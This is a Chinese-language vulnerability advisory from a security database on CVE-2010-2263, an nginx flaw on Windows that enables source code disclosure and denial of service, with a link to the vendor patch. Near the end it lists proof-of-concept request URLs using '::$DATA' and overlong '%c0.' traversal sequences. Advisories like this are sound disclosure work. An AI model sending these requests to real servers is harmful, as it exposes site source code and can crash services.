Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19804
HistoryJun 17, 2010 - 12:00 a.m.

nginx HTTP请求源码泄露和拒绝服务漏洞

2010-06-1700:00:00
Root
www.seebug.org
19

0.027 Low

EPSS

Percentile

90.6%

JSON

BugCVE: CVE-2010-2263
BUGTRAQ: 40760

nginx是多平台的HTTP服务器和邮件代理服务器

nginx服务器无法处理交换数据流(ADS),将其处理为普通文件的数据量。攻击者可以使用filename::$data的形式读取并下载Web应用文件的源码;此外如果在HTTP请求中添加了目录遍历序列的话,就可以覆盖内存寄存器,导致拒绝服务。

nginx 0.7.x/0.8.x
厂商补丁:
Igor Sysoev

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://nginx.org/download/nginx-0.8.40.zip


                                                http://www.example.com/index.html::$DATA
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://www.example.com/%c0.%c0./%c0.%c0./%20

Related

openvas 2
prion 1
cve 1
nessus 1
nvd 1
debiancve 1
nginx 1
cvelist 1
ubuntucve 1
openvas
openvas
nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
2010-06-14 00:00:00
nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
2010-06-14 00:00:00
prion
prion
Code injection
2010-06-15 14:04:00
cve
cve
CVE-2010-2263
2010-06-15 14:04:24
nessus
nessus
nginx < 0.7.66 / 0.8.x < 0.8.40 Information Disclosure
2018-03-09 00:00:00
nvd
nvd
CVE-2010-2263
2010-06-15 14:04:24
debiancve
debiancve
CVE-2010-2263
2010-06-15 14:04:24
nginx
nginx
Vulnerabilities with Windows file default stream
2010-06-15 14:04:24
cvelist
cvelist
CVE-2010-2263
2010-06-14 18:00:00
ubuntucve
ubuntucve
CVE-2010-2263
2010-06-15 00:00:00

0.027 Low

EPSS

Percentile

90.6%

JSON
Related for SSV:19804
openvas2prion1cve1nessus1nvd1debiancve1nginx1cvelist1ubuntucve1